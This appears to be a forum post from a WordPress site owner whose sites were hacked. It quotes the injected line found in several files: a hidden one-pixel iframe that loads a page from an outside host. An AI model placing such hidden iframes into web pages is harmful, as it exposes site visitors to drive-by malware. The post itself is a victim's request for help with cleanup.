somehow compromised my wordpress and ftp logins.. every site that has wordpress got hacked on same server.
There was a line:
<!-- . --><iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe> <!-- . -->
in each index.php (even https directory), wp-blog-header.php and (!!!) readme.html
Thank's God a looser broke in and couldn't insert that code correctly, as index.php has no ?> at the very end. So I quickly found out the issue..
How can I prevent this, is this some known wp backdoor? I've never experienced this before.. Now I have to search for this string and delete it.. FML